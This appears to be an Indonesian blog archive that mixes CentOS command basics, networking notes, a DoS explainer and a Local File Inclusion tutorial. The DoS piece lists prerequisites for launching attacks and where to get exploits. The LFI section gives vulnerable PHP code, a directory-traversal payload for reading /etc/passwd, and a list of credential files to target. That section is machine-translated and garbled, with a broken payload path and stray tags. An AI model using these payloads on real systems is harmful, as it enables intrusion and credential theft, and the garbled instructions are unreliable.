Rabu, 04 Januari 2012

Cara Mudah Belajar Linux Centos

Penjelasan Tentang Centos

Sebagai pengguna Linux yang masih baru, tentunya saya ingin mencoba berbagai distro yang ada pada Linux. Entah itu keturunan dari Redhat, atau dari Ubuntu. Tapi, karena rasa penasaran saya yang besar untuk menjajal distro Linux yang lain, maka saya mencoba menggunakan CentOS. CentOS adalah distro Linux keturunan dari RedHat. Saya mendapatkan file CentOS dari buku Info Linux. CentOS yang saya dapatkan adalah CentOS yang terbaru, yaitu versi 5.4. Dasar pemula, saat pertama kali menginstal CentOS 5.4 membuat Linux Mint 8 Helena raib dari susunan Grub (idiot) . (doh) Bagaimana cara mengembalikannya? Karena live CD Linux Mint 8 helena sedang dipinjam teman, maka saya menginstal ulang Linux Mint tersebut dengan Linux Mint 7 Gloria. Untung saja yang jadi korban adalah komputer saya. Sehingga Notebook andalan saya masih selamat dan masih bisa untuk mengoprek Ubuntu dan juga Linux Mint yang ada di notebook saya.
Saat pertama kali menjajal CentOS, saya merasa tampilannya tidak berbeda dengan Ubuntu. Hanya warna dan tema yang berbeda. Sayangnya, saat membuat screenshot, komputer saya tiba-tiba ngadat. Sehingga saya tidak bisa meneruskan rasa penasaran saya menggunakan CentOS. Hingga saya membuat tulisan ini, saya masih belum sempat untuk menjajal CentOS 5.4 lagi. Karena, saya khawatir kalau komputer saya akan ngambek lagi. Tapi, demi menuntaskan rasa penasaran saya terhadap CentOS 5.4, mungkin besok saya akan mencobanya kembali. Bagi para master Linux yang sudah mencoba CentOS, saya harap bisa membantu saya untuk mempelajari CentOS 5.4, terutama pada masalah perintah pada terminal. Untuk sementara, sekian dulu cerita tentang pengalaman meggunakan CentOS pertama kali. Mungkin jika nanti saya sudah menemukan celah dari distro Linux ini, saya akan share di sini.


Pertemuan 1 Linux Membuat User

Diposkan oleh Learn Linux Rabu, 23 Maret 2011 0 komentar
Setelah mengerti apa itu linux, maka dipertemuan ini kita akan mempelajari salah satu linux, yaitu linux centos. CentOS sendiri adalah singkatan dari Community ENTerprise Operating System, dikembangkan sebuah komunitas kontributor dan pengguna sistem operasi Linux. Pengguna tipikal Centos adalah organisasi dan individu yang tidak terlalu membutuhkan Layanan khusus (’strong commercial support) untuk menjalankan sistemnya dengan sukses. CentOS merupakan 100% kompatibel dengan Red Hat Enterprise Linux (RHEL) karena merupakan kembaran...

Penjelasan Tentang Centos

Pertama-tama Tekan CTRL-ALT-F2 untuk masuk ke Root Console dan log in sebagai root (memakai user dan password yang anda pilih ketika pertama kali menjalankan installer).
maka disana akan muncul
[root|@localhost|~]#
dimana :
root merupakan user yang aktif.@localhost merupakan hostname.
~ merupakan direktori yang aktif.

Sekarang, kita akan mencoba membuat user baru.
perintah yang digunakan adalah
adduser XXXXX(contoh nama user yang digunakan)
passwd 123456(contoh password yang disunakan)
dan jadilah user baru yaitu xxxxx dengan password 123456.

Untuk masuk ke user yang bersangkutan gunakan perintah.
su xxxx



Demikian penjelasan singkat saya mengenai pembuatan user pada linux. Dan untuk perintah-perintah yang lainnya serta penjelasannya saya jelaskan dibawah ini.
adduser xxx----> Untuk membuat user baru dengan nama user adalah xxx.
passwd xxx-----> Untuk membuat password dengan password xxx.
mkdir linux----> Untuk membuat direktori dengan nama direktori linux.
mkdir linux x2----> Untuk membuat direktori dengan nama direktori linux dan x2 sekaligus.
cd ----------> Untuk kembali ke direktori awal.
ls ----------> Untuk melihat isi direktori.
cd xxx-------> Untuk melihat isi direktori xxx.
cd ..--------> Untuk kembali ke direktori sebelumnya.
pwd ---------> Untuk melihat direktori yang aktif dari user.
su -l -------> Untuk kembali ke root.
reboot ------> Untuk merestart komputer.
power off ---> Untuk menonaktifkan komputer.



Secara garis besar ada 3 cara dalam membuat file di linux yaitu :
Membuat File
1. Touch nmfile
2. cat>nmfile
    cat>>nmfile
    catnmfile
3. echo>nmfile isifile
    echo>>nmfile isifile

Mengkopi File di Direktori
cp nmfile alamat dir tujuan
cp nmfile dir_tujuan/nmbaru
cp -r nmdir dirtujuan

Memindahkan File
mv nmfile dirtujuan
mv nmfile nmfilebaru

4. Melihat Baris Awal File
head -n nmfile

5. Melihat Baris Akhir File
tail -n nmfile

6. mengkompress file
    gzip nmfile

7. membaca file kompresan
    zcat nmfile

8. mengekstrak file
    gunzip nmfile

9. menghapus file & dir
    nm nmfile
    rmdir nmdir
    rm -r nmdir


masuk konsol
CTRL+ALT+F2

keluar konsol
CTRL+ALT+F7


untuk membuat user baru:
]#adduser_namauser
]#passwd_namauser

untuk mengaktifkan user pada root:
]su_namauser

untuk membuat direktori:
]#mkdir_namafile

untuk melihat direktori awal:
]#cd

untuk melihat isi direktori:
]#ls

untuk mengaktifkan direktori yg ada didalam nya:
]#cd_namafile

untuk melihat atau kembali ke direktori sebelumnya:
]#cd_..

untuk melihat direktori yg sedang aktif:
]#pwd

untuk kembali ke root:
]#su_-L

untuk restar komputer:
]#reboot

untuk non aktif komputer:
]#poweroff

membuat file baru:
]#touch_namafile
]#cat>namafile
]#cat>>namafile menambahkan isi file baru
]#echo>namafile_isifile
]#echo>>namafile_isifile menambahkan isi file baru

melihat isi file:
]#cat_namafile

mengkopi file atau direktori:
]#cp_namafile_alamat_dir_tujuan
]#cp_namafile_alamat_dir_tujuan/namabaru
]#cp_-r_namafile_alamat_dir_tujuan

memindah file & mengganti namafile:
]#mv_namafile_alamatdirtujuan
]#mv_namafile_namafilebaru

menghapus file:
]#rm_namafile

menghapus dir kosong:
]#rmdir_namadir

menghapus dir isi:
]#rm_-r_namadir

menampilkan baris awal:
]#head_-n_namafile

menampilkan akhir baris:
]#tail_-n_namafile

kompres file:
]#gzip_namafile

membaca file kompresan:
]#zcat_namafilekompresan

mengekstrak file kompres:
]#gunzip_namafile

membackup file:
hard link:
]#in_namafile_alamatdirtujuan

soft link:
]#in_-s_namafile_alamatdirtujuan

hak ijin akses:
]#chmod_nilaiakses_namafile

melihat nilai akses file:
]#Ls_-L

editor vi:
]#vi_namafile
Buka Coooyyy....

belajar linux administrations


Yuk belajar linux.

dalam hal ini ane hanya mempelajari linux CentOS hanya di dalam lab kampus aja, tapi ane sebenernya juga udah pernah install Ubuntu 10.10 di lepi ane, tapi ane udah unnistall, tapi ntar kalo ada waktu ane mau install lagi OS nya, ane rasa bagus buat belajar.
Ane pake windows7 enterprise di drive C:
klo ane install Ubuntu 10.10
di drive C: juga bisa ga ya ? Crash ga ya ?
Tolong di bantu yak ??
Sedikit pengetahuan ane yang udah ane pelajari ama Ibu MRT ;
Linux merupakan sistem operasi dgn kemammuan multi user, multi tasking dan bersifat free seperti yang tertuang dalam lisensi GNU GPL.
Salah satu perbedaan antara Windows vs linux misalnya untuk menunjukan keberadaan lokasi file ;
windows > D:\folder\folder\file.txt
Linux > D:/folder/folder/file.txt
Dimana bedanya ?
Penggunaan slash / di linux.
Sedangkan backslash \ di windows.
Di system linux juga case sensitive;
D:/folder/folder/file.txt berbeda dengan D:/Folder/Folder/file.txt
yaitu huruf BESAR berbeda dengan huruf kecil.

Sistem file LINUX mempunyai bentuk susunan hirarki / tree.

/ Root
/ Bin
/ Tmp
/ spool
/ Sbin
/ Usr
/ Dev
/ Etc
/ Home
/ User_baru (biasanya kita buat disini )
/ Boot

Puncaknya adalah Root, simbolnya / dan merupakan Administrator yang memiliki hak akses penuh dan pada user root, kita dapat membuat user akun baru.
Root punya banyak cabang dengan direktori standar, yang berarti nama nama direktori tsb dikenal semua system LINUX.

Direktori dan kegunaan pada system linux ;
/ adalah direktori yang berguna menampung seluruh file yg terdapat dalam sistem linux.
/ bin adalah direktori yang berisi file yang langsung dapat di jalankan CONTOH : Login, editor vi, gzip, unzip.
/ boot adalah direktori yang berisi file file yang digunakan saat linux melakukan booting.
/ dev adalah direktori yang berisi file file dari hardware yang dimiliki oleh komputer.
Contoh : /dev/fd0 untuk floppy, /dev/cdrom untuk CDROOM.
/ etc adalah direktori yang berisi file untuk mengkonfigurasi linux. Contoh passwd.
/ lib adalah direktori yang berisi file library yg di perlukan oleh program root.
/ tmp adalah direktori yang berisi file sementara.
/ usr adalah direktori yang berisi file yang dapat di jalankan oleh semua user.
/ sbin adalah direktori yang berisi file yang hanya dapat dijalankan oleh root. Contoh :shutdown, reboot.
/ home ini menyimpan semua user akun yang ada di system.

Tampilan konsol

[root@localhost~]#

root = user account.
localhost = host name.
~ = direktori.
# = prompt Shell.

Keterangan tambahan.
Jika user berada di root simbol prompt shell adalah #.
Namun jika user berada di account simbol promt shell adalah $.
Misal user sgenk berada di account, maka tampilan promt shell nya sbb:
[sgenk@localhost~]$

mohon di koreksi bila salah.
terimakasih dah baca, smoga bermanfaat.
Sumber : modul linux administrations
Buka Coooyyy....

KEAMANAN JARINGAN KOMPUTER

 ”Metode pencegahan serangan Denial of Services”

sambil menunggu sesuatu yang tidak pasti ane mau sher nh.... sambil belajar kemanan jaringan keamanan komputer..! apa itu serangan Denial of Service(DoS). Denial of Service atau yang mungkin lebih sering kita dengar dengan nama DoS merupakan suatu aktifitas yang menghambat laju kerja dari sebuah layanan atau malah mematikannya sehingga yang dapat menyebabkan pengguna yang asli/sah/memiliki hak akses tidak dapat menggunakan layanan. Dimana pada akhirnya, serangan ini mengakibatkan terhambatnya aktifitas yang akan dilakukan oleh korban yang akibatnya boleh dibilang sangat fatal.
          DoS merupakan serangan yang cukup menakutkan di dunia internet karena akibat dari serangan ini server akan mati dan tidak dapat beroperasi lagi sehingga otomatis tidak dapat meberikan pelayanan lagi. DoS memiliki beberapa jenis serangan, diantaranya adalah
  1. Ping of Death
  2. Teardrop
  3. SYN Attack
  4. Land Attack
  5. Smurf Attack
  6. UDP Flood
Selain itu, agar komputer atau mesin yang diserang lumpuh total karena kehabisan resource dan pada akhirnya komputer akan menjadi hang, maka dibutuhkan resource yang cukup besar untuk seorang penyerang dalam melakukan aksi penyerangannya terhadapa sasaran. Berikut ini merupakan beberapa resource yang dihabiskan :

  1. SwapSpace.Swap spase biasanya digunakan untuk mem-forked child proses.
  2. Bandwidth.Dalam serangan DoS, bukan hal yang aneh bila bandwith yang dipakai oleh korban akan dimakan habis.
  3. Kernel Tables.Serangan pada kernel tables, bisa berakibat sangat buruk pada sistem. Alokasi memori kepada kernel juga merupakan target serangan yang sensitif. Kernel memiliki kernelmap limit, jika sistem mencapai posisi ini, maka sistem tidak bisa lagi mengalokasikan memory untuk kernel dan sistem harus di re-boot.
  4. RAM. Serangan Denial of Service banyak menghabiskan RAM sehingga sistem mau-tidak mau harus di re-boot.
  5. Disk. Serangan klasik banyak dilakukan dengan memenuhi Disk.
data diatas merupakan beberapa bagian dari resource yang dihabiskan oleh serangan DoS.
Ada beberapa hal yang harus di perhatikan sebelum melakukan penyerangan DoS:
  • Serangan membutuhkan Shell Linux (Unix/Comp)
  • Mendapatkan exploits di: http://packetstormsecurity.nl (gunakan fungsi search agar lebih mudah)
  • Menggunakan/membutuhkan GCC (Gnu C Compiler)
Alasan Penyerangan
Banyak sekali motf yang melandasi penyerangan yang menggunakan denial of service ini. Seperti yang dijelas kan oleh Hans Husman” (t95hhu@student.tdb.uu.se) serangan ini dapat terjadi baik karena alasan politik, balas dendam, alasan ekonomi, maupun memang untuk aksi kejahatan.


Bukan suatu hal yang mustahil bagi siapa saja yang ingin melakukan serangan DoS. DoS merupakan jenis serangan yang menyerang layanan publik. Dan cara yang paling gampang yang sebenarnya bisa kita lakukan dengan cara menutuplayanan publik tersebut. Tapi itu hal yang tidak mungkin karena bukan atas dasar iseng saja orang menghubungkan ke jaringan luas, akan tetapi memang adanya keperluan-keperluan. Yang mengharuskan hal tersebut terjadi.
          Seperti yang sudah dibahas pada bab sebelumnya, behwa serangan DoS merupakan serangan yang melumpuhkan kinerja serven bahkan sampai menyebabkan server crass. Beberapa hal yang akan dilakukan dalam sistem penyerangan DoS yaitu diantaranya :
  1. Aktifitas 'flooding' terhadap suatu server.
  2. Memutuskan koneksi antara 2 mesin.
  3. Mencegah korban untuk dapat menggunakan layanan
  4. Merusak sistem agar korban tidak dapat menggunakan layanan.
Pada dunia maya terdapat dua istilah yang sudah sangat sering kita dengar, yaitu ”hacker” dan ”krecker”. Hacker merupakan orang yang biasanya melakukan penetrasi/scaning terhadap sebuah situs untuk mencari kelemahan-kelemahan dari situs tersebut. Akan tetapi seorang hacker tidak pernah melakukan pengrusakan ataupun mengubah data. Melainkan mereka akan memberitahukan pada admin bahwa terdapat cela yang harus diperbaiki untuk penjegahan agar tidak terjadi hal-hal yang merugukan. Sementara cracker kebalikan dari hacker, seorang crecker akan melakukan pengrusakan, pengubahan data,penyalah gunaan hak akses dan sebagainya(tindakan kejahatan). Banyak hal yang melatar belakangi seorang crecker berbuat jahat, baik motif balas dendam, mengeruk keuntungan berupa uang, dan sebagainya. Dalam dunia hack, juga terdapat istilah hacker topi putih, yaitu merupakan sebutan bagi seorang crecker yang sudah tobat, tidak menggunakan keakhliannya untuk hal-hal jahat lagi.

Zombie”
Menurut saya seorang penyerang itu seorang pengecut, kenapa saya beranggapan begitu?? Karena pada saat seorang penyerang melakukan serangan DoS kepada korbannya, biasanya mereka tidak langsung melakukan penyerang melalui jaringan internetnya sendiri ( IP addnya sendiri), melainkan merekan akan melakukan peloncatan menggunakan yang namanya ”zombie”. Zombie adalah sebuah komputer (tentunya milik orang lain) yang menjadi  di pergunakan untuk proses penyerangan.
Biasanya para penyerang tidak hanya sekali saja melakukan pelompatan, melewati para zombie, melaikan banyak, agar jejak mereka tidak terlacak. Pada umumnya si komputer yang dijadikan alat zombie, mereka tidak tahu kalu mereka sudah dimanfaatkan sebagai batu loncatan dalam penyerangan.
  

Jenis-jenis serangan Denial of Service (DoS)
Bagi para penyerang, tidak lah sulit untuk m,elakukan penyerangan, biasanya penyerang akan di bantu dengan program-program, Program-program DoS itu sendiri terdiri dari nestea, teardrop, land, boink,jolt dan vadim. Tidak begitu sulit untuk mendapatkan program-program ini. Berikut ini penjelasan dari macam-macam penyerangan DoS:

Ping of Death
Ping of Death merupakan jenis serangan yang sudah tidak baru lagi, semua vendor sistem operasi sudah memperbaiki sistemnya. Jenis serangan ini menggunakan utility ping yang ada pada sistem operasi komputer. Ping ini digunakan untuk mengecek waktu yang akan diperlukan untuk mengirim data tertentu dari satu komputer ke komputerlainnya. Panjang maksimum data menurut TCP protocol IP adalah 65,536 byte.


Selain itu, paket serangan Ping of Death dapat dengan mudah dispoof atau direkayasa sehingga tidak bisa diketahui asal sesungguhnya dari mana, dan penyerang hanya perlu mengetahui alamat IP dari komputer yang ingin diserangnya
                                
Penyerang dapat mengirimkan berbagai paket ICMP (digunakan untuk melakukan ping) yang terfragmentasi sehingga waktu paket-paket tersebut disatukan kembali, maka ukuran paket seluruhnya melebihi batas 65536 byte.Contoh yang sederhana adalah sebagai berikut: C:\windows>ping -l 65540 Perintah MSDOS di atas melakukan ping atau pengiriman paket ICMP berukuran 65540 byte ke suatu host/server.
Pada jenis serangan ini, data yang akan dikirim melebihi panjang maksimum yang disediakan. Jika sistem tidak siap pada saat penerimaan data, maka sistem akan hang, crash atau reboot.

Teardrop
Teardrop attack adalah suatu serangan bertipe Denial of Service (DoS)  erhadap suatu server/komputer yang terhubung dalam suatu jaringan.
Teardrop attack ini memanfaatkan fitur yang ada di TCP/IP yaitu packet fragmentation atau pemecahan paket, dan kelemahan yang ada di TCP/IP pada waktu paket-paket yang terfragmentasi tersebut disatukan kembali. Jenis serangan ini. dikembangkan dengan cara mengeksplotasi proses disassembly-reassembly paket data. Dalam jaringan Internet, seringkali data harus di potong kecil-kecil untuk menjamin reliabilitas & proses multiple akses jaringan. Potongan paket data ini, kadang harus dipotong ulang menjadi lebih kecil lagi pada saat di salurkan melalui saluran Wide Area Network (WAN) agar pada saat melalui saluran WAN yang tidak reliable proses pengiriman data menjadi lebih reliable.


Pada proses pemotongan data paket yang normal setiap potongan di berikan informasi offset data yang kira-kira berbunyi “potongan paket ini merupakan potongan 600 byte dari total 800 byte paket yang dikirim”. Program teardrop akan memanipulasi offset potongan data sehingga akhirnya terjadi overlapping antara paket yang diterima di bagian penerima setelah potongan-potongan paket ini di reassembly. Misalnya ada data sebesar 4000 byte yang ingin dikirim dari komputer A ke komputer B. Maka, data tersebut akan dipecah menjadi 3 paket demikian:
Di komputer B, ketiga paket tersebut diurutkan dan disatukan sesua dengan OFFSET yang ada di TCP header dari masing-masing paket. Terlihat di atas bahwa ketiga paket dapat diurutkan dan disatukan kembali menjadi data yang berukuran 4000 byte tanpa masalah.

gap dan overlap pada waktu paket-paket tersebut disatukan kembali. Byte 1501 sampai 1600 tidak ada, dan ada overlap di byte 2501 sampai 3100.

Akibat dari serangan :
Pada waktu server yang tidak terproteksi menerima paket-paket Seringkali, overlapping ini enimbulkan system yang crash, hang & reboot di ujung sebelah sana.

Penanggulangan :
Server bisa diproteksi dari tipe serangan teardrop ini dengan paket filtering melalui firewall yang sudah dikonfigurasi untuk memantau dan memblokir paketpaket yang berbahaya seperti ini.

SYN flood Attack
SYN-Flooding merupakan network Denial ofService yang memanfaatkan 'loophole' pada saat koneksi TCP/IP terbentuk. Kernel Linux terbaru (2.0.30 dan yang lebih baru) telah mempunyai option konfigurasi untuk mencegah Denial of Service dengan mencegah/menolak cracker untuk mengakses sistem.


Pada kondisi normal, client akan mengirimkan paket data berupa SYN (synchronization) untuk mensincrokan pada server. Lalu server akan menerima request dari client dan akan memberikan jawaban ke client berupa ACK (Acknowledgement). Sebagai tanda bahwa transaksi sudah dimulai (pengiriman & penerimaan data), maka client akan mengirimkan kembali sebuah paket yang berupa SYN lagi. Jenis serangan ini akan membajiri server dengan banyak paket SYN. Karena setiap pengiriman paket SYN oleh client, server pasti akan membalasnya dengan mengirim paket SYN ACK ke client. Server akan terus mencatat dan membuat antrian backlog untuk menungu respon ACK dari client yang sudah mengirim paket SYN tadi. Biasanya memori yang disediakan untuk backlog sangat kecil, . Pada saat antrian backlog ini penuh, sistem tidak akan merespond paket TCP SYN lain yang masuk – dalam bahasa sederhana-nya sistem tampak bengong / hang. Sialnya paket TCP SYN ACK yang masuk antrian backlog hanya akan dibuang dari backlog pada saat terjadi time out dari timer TCP yang menandakan tidak ada responds dari pengirim.  
Land attack merupakan salah satu jenis serangan SYN, karena menggunakan paket SYN (synchronization) pada saat melakukan 3-way Handshake untuk membentuk suatu hubungan TCP/IP antara client dengan server. Namun jenis serangan ini sudah tidak efektif lagi karena hampir pada setiap sistem sudah di proteksi melalui paket filtering ataupun firewall.
Berikut ini merupakan langkah –langkah yang akan dilakukan dalam melancarkan serangan land :
-      pertama-tama client akan mengirimkan sebuah paket pada server/host. Paket yang dikirim yaitu berupa paket SYN.
-      Setelah itu server/host akan menjawab permintaan dari client tersebut dengan cara mengirim paket SYN/ACK (Synchronization/Acknowledgement)
-      Stelah server mengirimkan balasan atas permintaan dari client, client punt akan kembali menjawab dengan cara mengirimkan sebuah paket ACK kembali pada server. Dengan  demikian hubungan antara clien dengan server sudah terjalin, sehingga transfer data bisa dimulai.
-      Client yang bertindak sebagai penyerang akan mengirimkan sebauh paket SYN ke server yang sudah di Dispoof (direkayasa). Paket data yang sudah direkayasa tersebut akan berisikan alamat asal (source address) dan port number asal (alamat dan port number dari server). Dimana akan sama persis dengan alamat tujuan (destination source) dan nomor port tujuan (destination port number). Pada saat server/host mengirimkan SYN/ACKK kembali ke pada si client, maka akan terjadi suatu infinite loop. Karena sebenarnya si server bukan mengirimkan paket tersebut ke client melainkan pada dirinya sendir.

Akibat dari serangan :
Seandainya server/host tersebut belum terproteksi terhadap jenis serangan ini, server akan crash/ hang.

Penanggulangan :
Cara mencegahnya yaitu dengan cara memproteksi sistem dengan paket filtering atau firewall.


Smurf Attack
Smurf attack adalah serangan secara paksa pada fitur spesifikasi IP yang kita kenal sebagai direct broadcast addressing. Seorang Smurf hacker biasanya membanjiri router kita dengan paket permintaan echo Internet Control Message Protocol (ICMP) yang kita kenal sebagai aplikasi ping.


Karena alamat IP tujuan pada paket yang dikirim adalah alamat broadcast dari jaringan anda, maka router akan mengirimkan permintaan ICMP echo ini ke semua mesin yang ada di jaringan. Kalau ada banyak host di jaringan, maka akan terhadi trafik ICMP echo respons & permintaan dalam jumlah yang sangat besar.

Akibat dari serangan :
jika si hacker ini memilih untuk men-spoof alamat IP sumber permintaan ICMP tersebut, akibatnya ICMP trafik tidak hanya akan memacetkan jaringan komputer perantara saja, tapi jaringan yang alamat IP-nya di spoof – jaringan ini di kenal sebagai jaringan korban (victim). Untuk menjaga agar jaringan kita tidak menjadi perantara bagi serangan Smurf ini, maka broadcast addressing harus di matikan di router kecuali jika kita sangat membutuhkannya untuk keperluan multicast, yang saat ini belum 100% di definikan. Alternatif lain, dengan cara memfilter permohonan ICMP echo pada firewall.

Penanggulangan :
Untuk menghindari agar jaringan kita tidak menjadi korban Smurf attack, ada baiknya kita mempunyai upstream firewall (di hulu) yang di set untuk memfilter ICMP echo atau membatasi trafik echo agar presentasinya kecil dibandingkan trafik jaringan secara keseluruhan.
UDP Flood
UDP flood merupakan serangan yang bersifat connectionless, yaitu tidak memperhatikan apakah paket yang dikirim diterima atau tidak. flood attack akan menempel pada servis UDP chargen di salah satu mesin, yang untuk keperluan “percobaan” akan mengirimkan sekelompok karakter ke mesin lain, yang di program untuk meng-echo setiap kiriman karakter yang di terima melalui servis chargen. Karena paket UDP tersebut di spoofing antara ke dua mesin tersebut, maka yang terjadi adalah banjir tanpa henti kiriman karakter yang tidak berguna antara ke dua mesin tersebut.


Penanggulangan :
Untuk menanggulangi UDP flood, anda dapat men-disable semua servis UDP di semua mesin di jaringan, atau yang lebih mudah memfilter pada firewall semua servis UDP yang masuk. Karena UDP dirancang untuk diagnostik internal, maka masih aman jika menolak semua paket UDP dari Internet. Tapi jika kita menghilangkan semua trafik UDP, maka beberapa aplikasi yang betul seperti RealAudio, yang menggunakan UDP sebagai mekanisme transportasi, tidak akan jalan. Bisa juag dengan menggunakan IDS dan catat dari log sistem yang biasanya dari port 53, tutp ip address source dan destination.

UDP Bomb Attack

UDP Bomb attack adalah suatu serangan bertipe Denial of Service (DoS)
terhadap suatu server atau komputer yang terhubung dalam suatu jaringan. Untuk melakukanserangan UDP Bomb terhadap suatu server, seorang penyerang mengirim sebuah paket UDP (User Datagram Protocol) yang telah dispoof atau direkayasa sehingga berisikan nilai-nilai yang tidak valid di field-field tertentu.

Jika server yang tidak terproteksi masih menggunakan sistem operasi (operating system) lama yang tidak dapat menangani paketpaket UDP yang tidak valid ini, maka server akan langsung crash. Contoh sistem operasi yang bisa dijatuhkan oleh UDP bomb attack adalah SunOS versi 4.1.3a1 atau versi sebelumnya.

Penanggulangan :
Kebanyakan sistem operasiakan membuang paket-paket UDP yang tidak valid, sehingga sistem operasi tersebut tidak akan crash. Namun, supaya lebih aman, sebaiknya menggunakan paket filtering melalui firewall untuk memonitor dan memblokir serangan seperti UDP Bomb attack.


Dunia cyber memang amat sangat tidak aman, Jalur internet dapat menjadi tempat kejahatan, banyak alasan kenama kejahatan dalan cyber terus menjamur :

  • Perangkat hukum yang mengatur tentang cyberspace atau dunia maya belum memadai
  • Kurangnya kemampuan penyidik disebabkan oleh :
1. Kurangnya pengetahuan tentang teknologi komputer
2. Pengalaman kasus cyber crime masih terbatas
3. Faktor pembuktian yang memerlukan saksi-saksi korban
(walaupun saksi korban diluar negeri).
  • Fasilitas komputer forensik
  • Kurangnya kerjasama Internasional

Terdapat banyak sekali varian dari serangan Denial os Service, diantaranya yang paling sering terjadi yaitu ping of death, teardrop, SYN flood attack, Smurf Attack, UDP boms attack, dan masih banyak lagi.

Begitu banyak serangan yang akan mengancam jaringan kita, namun jangan khawatir, berikut ini juga terdapat cara untuk mengatasi jenis serangan Denial od Service :
  1. Lakukan pencegahan serangan DoS dengan menutup servis servis/protokol protokol yang dianggap tidak perlu melalui firewall
  2. Non aktifkan IP directed broadcast untuk subnetwork subnetwork dalam domain anda guna mencegah serangan ini.
  3. Gunakan filter filter paket HANYA mengizinkan paket paket dengan IP address yang sah yang melewati jaringan.
  4. Ketahui lebih dini tentang bentuk serangan Denial of Service yang beredar, juga serangan berbasis tool tool yang didistribusikan para intruder.
 sumber referensi:
1.   http:// www.jim.geovedi.com









Buka Coooyyy....

Hacker VS Cracker ??


Mungkin teman2 sudah sering mendengar istilah Hacker & Cracker. Namun, apa yang dimaksud Hacker & Cracker ? Lalu apa perbedaannya ?

Perkembangan teknologi yang semakin pesat semakin meningkatnya tingkat kriminalitas yang dilakukan oleh penjahat lewat internet. Seorang penjahat internet tidak tanggung-tanggung menguras habis uang suatu perusahaan hanya dalam hitungan menit melalui internet.

Lalu, Siapa Penjahat Internet Tersebut ?

Penjahat tersebut disebut dengan istilah "Cracker". Cracker adalah musuh besar bagi Hacker karena mereka memiliki tujuan yang berkebalikan. Cracker memiliki tujuan untuk merusak komputer korban melalui internet sedangkan hacker memiliki tujuan untuk mengamankan atau memproteksi sistem pertahanan komputer. Banyak orang yang menganggap bahwa hacker sama saja dengan cracker padahal keduanya sangatlah berbeda, hanya mereka sama-sama seorang programmer yang mana bisa menyusup sistem keamanan komputer.

Sudah banyak perusahaan-perusahaan besar yang telah meminta bantuan para hacker untuk memproteksi sistem keamanan komputer perusahaan, beberapa perusahaan besar tersebut adalah Google, Yahoo, Microsoft, dan berbagai perusahaan lainnya.
Buka Coooyyy....

Pengenalan Dasar Tentang Jaringan Komputer


Berdasarkan kriterianya, jaringan komputer dibedakan menjadi 4 yaitu:

1. Berdasarkan distribusi sumber informasi/data

- Jaringan terpusat
Jaringan ini terdiri dari komputer klient dan server yang mana komputer klient yang berfungsi sebagai perantara untuk mengakses sumber informasi/data yang berasal dari satu komputer server

- Jaringan terdistribusi
Merupakan perpaduan beberapa jaringan terpusat sehingga terdapat beberapa komputer server yang saling berhubungan dengan klient membentuk sistem jaringan tertentu.


2. Berdasarkan jangkauan geografis dibedakan menjadi:

- Jaringan LAN
merupakan jaringan yang menghubungkan 2 komputer atau lebih dalam cakupan seperti laboratorium, kantor, serta dalam 1 warnet.

- Jaringan MAN
Merupakan jaringan yang mencakup satu kota besar beserta daerah setempat. Contohnya jaringan telepon lokal, sistem telepon seluler, serta jaringan relay beberapa ISP internet.

- Jaringan WAN
Merupakan jaringan dengan cakupan seluruh dunia. Contohnya jaringan PT. Telkom, PT. Indosat, serta jaringan GSM Seluler seperti Satelindo, Telkomsel, dan masih banyak lagi.


3. Berdasarkan peranan dan hubungan tiap komputer dalam memproses data.

- Jaringan Client-Server
Pada jaringan ini terdapat 1 atau beberapa komputer server dan komputer client. Komputer yang akan menjadi komputer server maupun menjadi komputer client dan diubah-ubah melalui software jaringan pada protokolnya. Komputer client sebagai perantara untuk dapat mengakses data pada komputer server sedangkan komputer server menyediakan informasi yang diperlukan oleh komputer client.

-Jaringan Peer-to-peer
Pada jaringan ini tidak ada komputer client maupun komputer server karena semua komputer dapat melakukan pengiriman maupun penerimaan informasi sehingga semua komputer berfungsi sebagai client sekaligus sebagai server.


4. Berdasarkan media transmisi data

- Jaringan Berkabel (Wired Network)
Pada jaringan ini, untuk menghubungkan satu komputer dengan komputer lain diperlukan penghubung berupa kabel jaringan. Kabel jaringan berfungsi dalam mengirim informasi dalam bentuk sinyal listrik antar komputer jaringan.

- Jaringan Nirkabel (Wireless Network)
Merupakan jaringan dengan medium berupa gelombang elektromagnetik. Pada jaringan ini tidak diperlukan kabel untuk menghubungkan antar komputer karena menggunakan gelombang elektromagnetik yang akan mengirimkan sinyal informasi antar komputer jaringan.
Buka Coooyyy....

Jumat, 30 Desember 2011

File Lokal Inklusi Tutorial

Pertama, di sini adalah kode yang rentan terhadap LFI
 
$page = $_GET[page];
include($page);
?>
 


Sekarang, kode ini dieksploitasi, karena halaman ini tidak dibersihkan, tetapi sebaliknya, lulus langsung ke situs web. (un) untungnya mengeksploitasi ini umumnya ditemukan di world wide web.

Untuk ini, kita harus membayangkan bahwa ada sebuah direktori bernama / test dan sebuah file bernama test.php di sana ... Jadi url examplue kami akan. www.example.com / test / test.php. Sekarang, kita juga harus mengasumsikan ada file di / tes yang index.php .. Dan bahwa ada file indeks di sana. Jadi file indeks kami akan www.example.com / test / index.php, dan file pengujian kami adalah www.example.com / test / test.php. Jika contoh file indeks kami memiliki kode php rentan di dalamnya kita harus bisa pergi ke www.example.com/test/index.php?page=../test.php. (The .. / adalah direktori transversal, memungkinkan kita untuk naik satu direktori)

Jika mengatakan, situs itu host pada server unix, maka kita mungkin bisa melakukan transversal direktori ke file password. Untuk menguji, kita bisa pergi ke: www.example.com/test/index.php?page=../../../../../../../../../. / .. / .. / ... / .. / ETX / passwd

Jika berhasil, halaman harus terlihat seperti:

 
username: passwd:UID:GID:full_name:directory:shell
 



Sebuah contoh file mengatakan, akan menjadi:
 
username:kbeMVnZM0oL7I:503:100:FullName:/home/user name:/bin/sh
 
 
Meskipun, password dapat berbayang, jika demikian, maka akan terlihat seperti
 
username:x:503:100:FullName:/home/username:/bin/sh
 



Password dalam contoh itu, akan terletak di / etc / shadow (Yang Anda akan kemungkinan besar tidak memiliki akses ke, karena hal ini terutama hanya dapat dibaca / ditulisi oleh root. Tapi / etc / passwd dapat dibaca oleh banyak proccesses, karena thats mengapa Anda dapat membacanya.

Jika Anda melihat sesuatu seperti

 
username:!:503:100:FullName:/home/username:/bin/sh[code]
Then you would know that the password is stored in /etc/security/passwd

A few good directories to visit would be
[code]
/etc/passwd/etc/shadow/etc/group
/etc/security/group
/etc/security/passwd 
/etc/security/user 
/etc/security/environ 
/etc/security/limits/usr 
/lib/security/mkuser.default
 
 
